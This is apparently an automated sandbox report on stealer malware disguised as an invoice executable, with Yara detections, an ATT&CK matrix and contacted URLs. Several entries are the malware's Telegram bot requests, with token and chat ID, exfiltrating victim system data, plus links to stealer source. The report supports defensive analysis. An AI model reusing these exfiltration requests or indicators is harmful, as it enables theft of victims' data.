Source: Yara match	File source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Scheduled Task/Job	2 Scheduled Task/Job	11 Process Injection	121 Obfuscated Files or Information	1 Input Capture	144 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Scheduled Task/Job	12 Software Packing	Security Account Manager	441 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	251 Virtualization/Sandbox Evasion	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	251 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Invoice-BL. Payment TT $ 28,945.99.exe	74%	ReversingLabs	Win32.Trojan.Leonem
Invoice-BL. Payment TT $ 28,945.99.exe	69%	Virustotal		Browse
Invoice-BL. Payment TT $ 28,945.99.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	74%	ReversingLabs	Win32.Trojan.Leonem

Source	Detection	Scanner	Label
http://api.telegram.orgd	0%	Avira URL Cloud	safe
https://api.tele	0%	Avira URL Cloud	safe
http://icanhazip.comd	0%	Avira URL Cloud	safe
http://api.mylnikov.orgd	0%	Avira URL Cloud	safe
https://api.telegram.orgd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.mylnikov.org	172.67.196.114	true	false	high
api.telegram.org	149.154.167.220	true	false	high
icanhazip.com	104.16.184.241	true	false	high
59.60.14.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-12-31%208:29:05%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20932923%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20UK7PCEYE%0ARAM:%204095MB%0AHWID:%20EE6ED39488%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True	false	high
http://icanhazip.com/	false	high
https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-12-31%208:29:15%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20932923%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20UK7PCEYE%0ARAM:%204095MB%0AHWID:%20EE6ED39488%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True	false	high
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false	high
https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	tmp157F.tmp.dat.6.dr	false		high
http://www.fontbureau.com/designersG	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	false		high
http://www.fontbureau.com/designers/?	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003377000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003311000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003962000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=52871	SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	false		high
http://www.fontbureau.com/designers	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003272000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	tmp3F96.tmp.dat.11.dr, History.txt0.11.dr, tmp147E.tmp.dat.6.dr, History.txt0.6.dr, tmp3F75.tmp.dat.11.dr, tmp146E.tmp.dat.6.dr	false		high
http://www.goodfont.co.kr	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty0&yq	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty	SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	tmp3F96.tmp.dat.11.dr, tmp147E.tmp.dat.6.dr, tmp3F75.tmp.dat.11.dr, tmp146E.tmp.dat.6.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	false		high
http://www.galapagosdesign.com/DPlease	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003272000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.orgd	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003377000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003311000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003962000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://icanhazip.com	SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723026401.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1824098477.0000000002C02000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1724798197.0000000005694000.00000004.00000020.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	false		high
https://github.com/LimerBoy/StormKittyTCqq	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=	SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	tmp3F96.tmp.dat.11.dr, History.txt0.11.dr, tmp147E.tmp.dat.6.dr, History.txt0.6.dr, tmp3F75.tmp.dat.11.dr, tmp146E.tmp.dat.6.dr	false		high
https://www.ecosia.org/newtab/	tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	false		high
http://icanhazip.comd	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003272000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmp157F.tmp.dat.6.dr	false		high
http://icanhazip.com/t	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&	SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003377000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.00000000032F7000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003948000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.tele	SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.orgd	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003377000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.00000000032F7000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003948000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	tmp157F.tmp.dat.6.dr	false		high
http://api.mylnikov.orgd	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.000000000392A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/file/bot	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	tmp3F96.tmp.dat.11.dr, tmp147E.tmp.dat.6.dr, tmp3F75.tmp.dat.11.dr, tmp146E.tmp.dat.6.dr	false		high
http://api.telegram.org	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003377000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003311000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.mylnikov.org	Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.000000000392A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	false		high
https://pastebin.com/raw/7B75u64B	Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
